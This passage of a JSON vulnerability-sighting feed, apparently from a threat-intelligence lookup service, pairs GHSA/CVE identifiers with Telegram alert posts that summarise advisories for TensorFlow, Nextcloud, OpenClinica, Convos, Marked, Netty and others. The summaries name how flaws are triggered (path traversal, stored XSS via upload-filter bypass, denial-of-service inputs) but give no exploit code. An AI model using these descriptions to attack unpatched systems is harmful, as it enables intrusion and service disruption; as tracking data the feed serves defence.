"1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-H2WQ-PRV9-2F56", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/12924", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2022-29192\n\ud83d\udd25 CVSS Score: 5.5 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: TensorFlow is an open source platform for machine learning. Prior to versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4, the implementation of `tf.raw_ops.QuantizeAndDequantizeV4Grad` does not fully validate the input arguments. This results in a `CHECK`-failure which can be used to trigger a denial of service attack. Versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4 contain a patch for this issue.\n\ud83d\udccf Published: 2022-05-20T20:30:14.000Z\n\ud83d\udccf Modified: 2025-04-22T18:00:33.691Z\n\ud83d\udd17 References:\n1. https://github.com/tensorflow/tensorflow/security/advisories/GHSA-h2wq-prv9-2f56\n2. https://github.com/tensorflow/tensorflow/commit/098e7762d909bac47ce1dbabe6dfd06294cb9d58\n3. https://github.com/tensorflow/tensorflow/blob/f3b9bf4c3c0597563b289c0512e98d4ce81f886e/tensorflow/core/kernels/quantize_and_dequantize_op.cc#L148-L226\n4. https://github.com/tensorflow/tensorflow/releases/tag/v2.6.4\n5. https://github.com/tensorflow/tensorflow/releases/tag/v2.7.2\n6. https://github.com/tensorflow/tensorflow/releases/tag/v2.8.1\n7. https://github.com/tensorflow/tensorflow/releases/tag/v2.9.0", "creation_timestamp": "2025-04-22T18:03:38.000000Z"}, {"uuid": "44d563ea-61df-4744-a809-f698309e5a54", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9RRV-PRFF-QPH7", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/12918", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2022-24830\n\ud83d\udd25 CVSS Score: 6.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N)\n\ud83d\udd39 Description: OpenClinica is an open source software for Electronic Data Capture (EDC) and Clinical Data Management (CDM). OpenClinica prior to version 3.16 is vulnerable to path traversal in multiple endpoints, leading to arbitrary file read/write, and potential remote code execution. There are no known workarounds. This issue has been patched and users are recommended to upgrade.\n\ud83d\udccf Published: 2022-05-13T23:40:09.000Z\n\ud83d\udccf Modified: 2025-04-22T18:01:35.975Z\n\ud83d\udd17 References:\n1. https://github.com/OpenClinica/OpenClinica/security/advisories/GHSA-9rrv-prff-qph7\n2. https://github.com/OpenClinica/OpenClinica/commit/6f864e86543f903bd20d6f9fc7056115106441f3", "creation_timestamp": "2025-04-22T18:03:29.000000Z"}, {"uuid": "951d3b9d-2239-44fd-83bb-339ebf7792b9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-XCJ9-3JCH-QR2R", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/12923", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2022-29160\n\ud83d\udd25 CVSS Score: 2.8 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:N)\n\ud83d\udd39 Description: Nextcloud Android is the Android client for Nextcloud, a self-hosted productivity platform. Prior to version 3.19.0, sensitive tokens, images, and user related details exist after deletion of a user account. This could result in misuse of the former account holder's information. Nextcloud Android version 3.19.0 contains a patch for this issue. There are no known workarounds available.\n\ud83d\udccf Published: 2022-05-20T15:55:10.000Z\n\ud83d\udccf Modified: 2025-04-22T18:00:43.200Z\n\ud83d\udd17 References:\n1. https://github.com/nextcloud/security-advisories/security/advisories/GHSA-xcj9-3jch-qr2r\n2. https://github.com/nextcloud/android/pull/9644\n3. https://hackerone.com/reports/1222873", "creation_timestamp": "2025-04-22T18:03:37.000000Z"}, {"uuid": "f0298a1d-7886-4d48-971d-cb45e0fd1e2b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-HX9W-XFRG-2QVP", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/12922", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2022-24906\n\ud83d\udd25 CVSS Score: 3.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:N)\n\ud83d\udd39 Description: Nextcloud Deck is a Kanban-style project &amp; personal management tool for Nextcloud, similar to Trello. The full path of the application is exposed to unauthorized users. It is recommended that the Nextcloud Deck app is upgraded to 1.2.11, 1.4.6, or 1.5.4. There is no workaround available.\n\ud83d\udccf Published: 2022-05-20T15:40:17.000Z\n\ud83d\udccf Modified: 2025-04-22T18:00:53.353Z\n\ud83d\udd17 References:\n1. https://github.com/nextcloud/security-advisories/security/advisories/GHSA-hx9w-xfrg-2qvp\n2. https://github.com/nextcloud/deck/pull/3384\n3. https://hackerone.com/reports/1354334", "creation_timestamp": "2025-04-22T18:03:36.000000Z"}, {"uuid": "1dc7856c-7ba4-4846-9854-4acf76ad2e6f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-VQHF-673W-7R3J", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/12921", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2022-29159\n\ud83d\udd25 CVSS Score: 5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:L/A:N)\n\ud83d\udd39 Description: Nextcloud Deck is a Kanban-style project &amp; personal management tool for Nextcloud. In versions prior to 1.4.8, 1.5.6, and 1.6.1, an authenticated user can move stacks with cards from their own board to a board of another user. The Nextcloud Deck app contains a patch for this issue in versions 1.4.8, 1.5.6, and 1.6.1. There are no known currently-known workarounds available.\n\ud83d\udccf Published: 2022-05-20T15:40:10.000Z\n\ud83d\udccf Modified: 2025-04-22T18:01:04.377Z\n\ud83d\udd17 References:\n1. https://github.com/nextcloud/security-advisories/security/advisories/GHSA-vqhf-673w-7r3j\n2. https://github.com/nextcloud/deck/pull/3541\n3. https://hackerone.com/reports/1450117", "creation_timestamp": "2025-04-22T18:03:35.000000Z"}, {"uuid": "7e7f371d-18cd-42b7-94c0-ca034ed3e6cd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-XR72-2G43-586W", "type": "published-proof-of-concept", "source": "Telegram/rY7awwgYiyf4MoJmU46p1ZfRs7aDMuxx9VM2nTHHFeQecLc", "content": "", "creation_timestamp": "2026-01-02T21:50:38.000000Z"}, {"uuid": "e7e09b3f-1b45-4e30-9ce4-15dd3ce21968", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2P9Q-H29J-3F5V", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/12927", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2022-29193\n\ud83d\udd25 CVSS Score: 5.5 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: TensorFlow is an open source platform for machine learning. Prior to versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4, the implementation of `tf.raw_ops.TensorSummaryV2` does not fully validate the input arguments. This results in a `CHECK`-failure which can be used to trigger a denial of service attack. Versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4 contain a patch for this issue.\n\ud83d\udccf Published: 2022-05-20T21:20:14.000Z\n\ud83d\udccf Modified: 2025-04-22T17:59:57.988Z\n\ud83d\udd17 References:\n1. https://github.com/tensorflow/tensorflow/releases/tag/v2.6.4\n2. https://github.com/tensorflow/tensorflow/releases/tag/v2.7.2\n3. https://github.com/tensorflow/tensorflow/releases/tag/v2.8.1\n4. https://github.com/tensorflow/tensorflow/releases/tag/v2.9.0\n5. https://github.com/tensorflow/tensorflow/security/advisories/GHSA-2p9q-h29j-3f5v\n6. https://github.com/tensorflow/tensorflow/commit/290bb05c80c327ed74fae1d089f1001b1e2a4ef7\n7. https://github.com/tensorflow/tensorflow/blob/f3b9bf4c3c0597563b289c0512e98d4ce81f886e/tensorflow/core/kernels/summary_tensor_op.cc#L33-L58", "creation_timestamp": "2025-04-22T18:03:44.000000Z"}, {"uuid": "e2d6fd6f-257c-4173-81b2-5640fb8f54b1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-H5G4-PPWX-48Q2", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/12926", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2022-29194\n\ud83d\udd25 CVSS Score: 5.5 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: TensorFlow is an open source platform for machine learning. Prior to versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4, the implementation of `tf.raw_ops.DeleteSessionTensor` does not fully validate the input arguments. This results in a `CHECK`-failure which can be used to trigger a denial of service attack. Versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4 contain a patch for this issue.\n\ud83d\udccf Published: 2022-05-20T21:10:12.000Z\n\ud83d\udccf Modified: 2025-04-22T18:00:13.737Z\n\ud83d\udd17 References:\n1. https://github.com/tensorflow/tensorflow/releases/tag/v2.6.4\n2. https://github.com/tensorflow/tensorflow/releases/tag/v2.7.2\n3. https://github.com/tensorflow/tensorflow/releases/tag/v2.8.1\n4. https://github.com/tensorflow/tensorflow/releases/tag/v2.9.0\n5. https://github.com/tensorflow/tensorflow/security/advisories/GHSA-h5g4-ppwx-48q2\n6. https://github.com/tensorflow/tensorflow/commit/cff267650c6a1b266e4b4500f69fbc49cdd773c5\n7. https://github.com/tensorflow/tensorflow/blob/f3b9bf4c3c0597563b289c0512e98d4ce81f886e/tensorflow/core/kernels/session_ops.cc#L128-L144", "creation_timestamp": "2025-04-22T18:03:43.000000Z"}, {"uuid": "aafeba1e-5b2f-4121-a2bd-dc428de73535", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-MM2V-4V7G-M695", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/12947", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2022-21650\n\ud83d\udd25 CVSS Score: 7.6 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:N)\n\ud83d\udd39 Description: Convos is an open source multi-user chat that runs in a web browser. You can't use SVG extension in Convos' chat window, but you can upload a file with an .html extension. By uploading an SVG file with an html extension the upload filter can be bypassed. This causes Stored XSS. Also, after uploading a file the XSS attack is triggered upon a user viewing the file. Through this vulnerability, an attacker is capable to execute malicious scripts. Users are advised to update as soon as possible.\n\ud83d\udccf Published: 2022-01-04T20:40:14.000Z\n\ud83d\udccf Modified: 2025-04-22T18:34:37.741Z\n\ud83d\udd17 References:\n1. https://blog.pocas.kr/2021/12/30/2021-12-30-s-xss-convos-chat/#First-vulnerability\n2. https://github.com/convos-chat/convos/commit/5c0a1ec9a2c147bc3b63fd5a48da5f32e18fe5df\n3. https://www.huntr.dev/bounties/ae424798-de01-4972-b73b-2db674f82368/\n4. https://github.com/convos-chat/convos/security/advisories/GHSA-mm2v-4v7g-m695", "creation_timestamp": "2025-04-22T19:03:42.000000Z"}, {"uuid": "18cabb96-57d4-42a5-8cb2-da6b964e4003", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-768M-5W34-2XF5", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/13092", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2022-31157\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N)\n\ud83d\udd39 Description: LTI 1.3 Tool Library is a library used for building IMS-certified LTI 1.3 tool providers in PHP. Prior to version 5.0, the function used to generate random nonces was not sufficiently cryptographically complex. Users should upgrade to version 5.0 to receive a patch. There are currently no known workarounds.\n\ud83d\udccf Published: 2022-07-15T17:15:21.000Z\n\ud83d\udccf Modified: 2025-04-23T17:58:11.075Z\n\ud83d\udd17 References:\n1. https://github.com/packbackbooks/lti-1-3-php-library/security/advisories/GHSA-768m-5w34-2xf5", "creation_timestamp": "2025-04-23T18:05:27.000000Z"}, {"uuid": "57b456ea-69db-4c61-bf66-10ca3e9102ed", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-J6F8-WH4V-JC37", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/13096", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2022-31164\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N)\n\ud83d\udd39 Description: Tovy is a a staff management system for Roblox groups. A vulnerability in versions prior to 0.7.51 allows users to log in as other users, including privileged users such as the other of the instance. The problem has been patched in version 0.7.51.\n\ud83d\udccf Published: 2022-07-21T13:35:11.000Z\n\ud83d\udccf Modified: 2025-04-23T17:57:46.757Z\n\ud83d\udd17 References:\n1. https://github.com/tovyblox/tovy/security/advisories/GHSA-j6f8-wh4v-jc37\n2. https://github.com/tovyblox/tovy/pull/63", "creation_timestamp": "2025-04-23T18:05:34.000000Z"}, {"uuid": "bd40cda7-2855-4ac6-9f61-6aacec0622a2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2VV3-56QG-G2CF", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/12928", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2022-29200\n\ud83d\udd25 CVSS Score: 5.5 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: TensorFlow is an open source platform for machine learning. Prior to versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4, the implementation of `tf.raw_ops.LSTMBlockCell` does not fully validate the input arguments. This results in a `CHECK`-failure which can be used to trigger a denial of service attack. The code does not validate the ranks of any of the arguments to this API call. This results in `CHECK`-failures when the elements of the tensor are accessed. Versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4 contain a patch for this issue.\n\ud83d\udccf Published: 2022-05-20T21:30:14.000Z\n\ud83d\udccf Modified: 2025-04-22T17:59:47.129Z\n\ud83d\udd17 References:\n1. https://github.com/tensorflow/tensorflow/releases/tag/v2.6.4\n2. https://github.com/tensorflow/tensorflow/releases/tag/v2.7.2\n3. https://github.com/tensorflow/tensorflow/releases/tag/v2.8.1\n4. https://github.com/tensorflow/tensorflow/releases/tag/v2.9.0\n5. https://github.com/tensorflow/tensorflow/security/advisories/GHSA-2vv3-56qg-g2cf\n6. https://github.com/tensorflow/tensorflow/commit/803404044ae7a1efac48ba82d74111fce1ddb09a\n7. https://github.com/tensorflow/tensorflow/blob/f3b9bf4c3c0597563b289c0512e98d4ce81f886e/tensorflow/core/kernels/rnn/lstm_ops.cc", "creation_timestamp": "2025-04-22T18:03:44.000000Z"}, {"uuid": "06a59b12-e37a-45a9-a750-822571a9e352", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-34JX-3VMR-56V8", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/12945", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2021-39143\n\ud83d\udd25 CVSS Score: 6.6 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:H)\n\ud83d\udd39 Description: Spinnaker is an open source, multi-cloud continuous delivery platform. A path traversal vulnerability was discovered in uses of TAR files by AppEngine for deployments. This uses a utility to extract files locally for deployment without validating the paths in that deployment don't override system files. This would allow an attacker to override files on the container, POTENTIALLY introducing a MITM type attack vector by replacing libraries or injecting wrapper files. Users are advised to update as soon as possible. For users unable to update disable Google AppEngine deployments and/or disable artifacts that provide TARs.\n\ud83d\udccf Published: 2022-01-04T17:25:10.000Z\n\ud83d\udccf Modified: 2025-04-22T18:34:51.842Z\n\ud83d\udd17 References:\n1. https://github.com/spinnaker/spinnaker/security/advisories/GHSA-34jx-3vmr-56v8", "creation_timestamp": "2025-04-22T19:03:40.000000Z"}, {"uuid": "ff8eb5d7-1315-4029-b2ef-aa0577f3f861", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9J4V-PP28-MXV7", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/13072", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2022-36019\n\ud83d\udd25 CVSS Score: 5.9 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: TensorFlow is an open source platform for machine learning. If `FakeQuantWithMinMaxVarsPerChannel` is given `min` or `max` tensors of a rank other than one, it results in a `CHECK` fail that can be used to trigger a denial of service attack. We have patched the issue in GitHub commit 785d67a78a1d533759fcd2f5e8d6ef778de849e0. The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also affected and still in supported range. There are no known workarounds for this issue.\n\ud83d\udccf Published: 2022-09-16T22:05:10.000Z\n\ud83d\udccf Modified: 2025-04-23T17:01:22.483Z\n\ud83d\udd17 References:\n1. https://github.com/tensorflow/tensorflow/commit/785d67a78a1d533759fcd2f5e8d6ef778de849e0\n2. https://github.com/tensorflow/tensorflow/security/advisories/GHSA-9j4v-pp28-mxv7", "creation_timestamp": "2025-04-23T17:04:41.000000Z"}, {"uuid": "b3cfd46d-9074-4f6f-b4be-d845e9db37ea", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-CV2P-32V3-VHWQ", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/13077", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2022-36003\n\ud83d\udd25 CVSS Score: 5.9 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: TensorFlow is an open source platform for machine learning. When `RandomPoissonV2` receives large input shape and rates, it gives a `CHECK` fail that can trigger a denial of service attack. We have patched the issue in GitHub commit 552bfced6ce4809db5f3ca305f60ff80dd40c5a3. The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also affected and still in supported range. There are no known workarounds for this issue.\n\ud83d\udccf Published: 2022-09-16T22:10:21.000Z\n\ud83d\udccf Modified: 2025-04-23T17:00:52.567Z\n\ud83d\udd17 References:\n1. https://github.com/tensorflow/tensorflow/security/advisories/GHSA-cv2p-32v3-vhwq\n2. https://github.com/tensorflow/tensorflow/commit/552bfced6ce4809db5f3ca305f60ff80dd40c5a3", "creation_timestamp": "2025-04-23T17:04:49.000000Z"}, {"uuid": "03844679-ce08-4c29-bd2c-dd5dd717c998", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-R26C-679W-MRJM", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/13079", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2022-36005\n\ud83d\udd25 CVSS Score: 5.9 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: TensorFlow is an open source platform for machine learning. When `tf.quantization.fake_quant_with_min_max_vars_gradient` receives input `min` or `max` that is nonscalar, it gives a `CHECK` fail that can trigger a denial of service attack. We have patched the issue in GitHub commit f3cf67ac5705f4f04721d15e485e192bb319feed. The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also affected and still in supported range. There are no known workarounds for this issue.\n\ud83d\udccf Published: 2022-09-16T22:10:31.000Z\n\ud83d\udccf Modified: 2025-04-23T17:00:39.728Z\n\ud83d\udd17 References:\n1. https://github.com/tensorflow/tensorflow/commit/f3cf67ac5705f4f04721d15e485e192bb319feed\n2. https://github.com/tensorflow/tensorflow/security/advisories/GHSA-r26c-679w-mrjm", "creation_timestamp": "2025-04-23T17:04:51.000000Z"}, {"uuid": "3d85f5d7-2b2d-41bb-b48e-c6fc59dca020", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7XQ5-54JP-2MFG", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/12542", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-32377\n\ud83d\udd25 CVSS Score: 6.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L)\n\ud83d\udd39 Description: Rasa Pro is a framework for building scalable, dynamic conversational AI assistants that integrate large language models (LLMs). A vulnerability has been identified in Rasa Pro where voice connectors in Rasa Pro do not properly implement authentication even when a token is configured in the credentials.yml file. This could allow an attacker to submit voice data to the Rasa Pro assistant from an unauthenticated source. This issue has been patched for audiocodes, audiocodes_stream, and genesys connectors in versions 3.9.20, 3.10.19, 3.11.7 and 3.12.6.\n\ud83d\udccf Published: 2025-04-18T19:59:32.286Z\n\ud83d\udccf Modified: 2025-04-18T20:35:41.744Z\n\ud83d\udd17 References:\n1. https://github.com/RasaHQ/security-advisories/security/advisories/GHSA-7xq5-54jp-2mfg", "creation_timestamp": "2025-04-18T20:59:25.000000Z"}, {"uuid": "782e7913-10c5-4930-95b0-fb3b94ca6b47", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5V2H-R2CX-5XGJ", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/12954", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2022-21681\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: Marked is a markdown parser and compiler. Prior to version 4.0.10, the regular expression `inline.reflinkSearch` may cause catastrophic backtracking against some strings and lead to a denial of service (DoS). Anyone who runs untrusted markdown through a vulnerable version of marked and does not use a worker with a time limit may be affected. This issue is patched in version 4.0.10. As a workaround, avoid running untrusted markdown through marked or run marked on a worker thread and set a reasonable time limit to prevent draining resources.\n\ud83d\udccf Published: 2022-01-14T00:00:00.000Z\n\ud83d\udccf Modified: 2025-04-22T18:33:29.916Z\n\ud83d\udd17 References:\n1. https://github.com/markedjs/marked/security/advisories/GHSA-5v2h-r2cx-5xgj\n2. https://github.com/markedjs/marked/commit/8f806573a3f6c6b7a39b8cdb66ab5ebb8d55a5f5\n3. https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/AIXDMC3CSHYW3YWVSQOXAWLUYQHAO5UX/", "creation_timestamp": "2025-04-22T19:03:49.000000Z"}, {"uuid": "a11d8a6a-1d0d-4717-a24b-4cf5f393efd7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5MCR-GQ6C-3HQ2", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/12916", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2022-24823\n\ud83d\udd25 CVSS Score: 5.5 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N)\n\ud83d\udd39 Description: Netty is an open-source, asynchronous event-driven network application framework. The package `io.netty:netty-codec-http` prior to version 4.1.77.Final contains an insufficient fix for CVE-2021-21290. When Netty's multipart decoders are used local information disclosure can occur via the local system temporary directory if temporary storing uploads on the disk is enabled. This only impacts applications running on Java version 6 and lower. Additionally, this vulnerability impacts code running on Unix-like systems, and very old versions of Mac OSX and Windows as they all share the system temporary directory between all users. Version 4.1.77.Final contains a patch for this vulnerability. As a workaround, specify one's own `java.io.tmpdir` when starting the JVM or use DefaultHttpDataFactory.setBaseDir(...) to set the directory to something that is only readable by the current user.\n\ud83d\udccf Published: 2022-05-06T12:05:11.000Z\n\ud83d\udccf Modified: 2025-04-22T18:01:57.607Z\n\ud83d\udd17 References:\n1. https://github.com/netty/netty/security/advisories/GHSA-269q-hmxg-m83q\n2. https://github.com/netty/netty/security/advisories/GHSA-5mcr-gq6c-3hq2\n3. https://github.com/netty/netty/commit/185f8b2756a36aaa4f973f1a2a025e7d981823f1\n4. https://www.oracle.com/security-alerts/cpujul2022.html\n5. https://security.netapp.com/advisory/ntap-20220616-0004/", "creation_timestamp": "2025-04-22T18:03:28.000000Z"}, {"uuid": "6afb4f5f-fad8-454d-89ba-18eda72470b7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-269Q-HMXG-M83Q", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/12916", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2022-24823\n\ud83d\udd25 CVSS Score: 5.5 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N)\n\ud83d\udd39 Description: Netty is an open-source, asynchronous event-driven network application framework. The package `io.netty:netty-codec-http` prior to version 4.1.77.Final contains an insufficient fix for CVE-2021-21290. When Netty's multipart decoders are used local information disclosure can occur via the local system temporary directory if temporary storing uploads on the disk is enabled. This only impacts applications running on Java version 6 and lower. Additionally, this vulnerability impacts code running on Unix-like systems, and very old versions of Mac OSX and Windows as they all share the system temporary directory between all users. Version 4.1.77.Final contains a patch for this vulnerability. As a workaround, specify one's own `java.io.tmpdir` when starting the JVM or use DefaultHttpDataFactory.setBaseDir(...) to set the directory to something that is only readable by the current user.\n\ud83d\udccf Published: 2022-05-06T12:05:11.000Z\n\ud83d\udccf Modified: 2025-04-22T18:01:57.607Z\n\ud83d\udd17 References:\n1. https://github.com/netty/netty/security/advisories/GHSA-269q-hmxg-m83q\n2. https://github.com/netty/netty/security/advisories/GHSA-5mcr-gq6c-3hq2\n3. https://github.com/netty/netty/commit/185f8b2756a36aaa4f973f1a2a025e7d981823f1\n4. https://www.oracle.com/security-alerts/cpujul2022.html\n5. https://security.netapp.com/advisory/ntap-20220616-0004/", "creation_timestamp": "2025-04-22T18:03:28.000000Z"}, {"uuid": "35d2cfe9-26ea-4d0d-9f29-ba6ce814c99a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-59JR-PJ65-QMVR", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/12946", 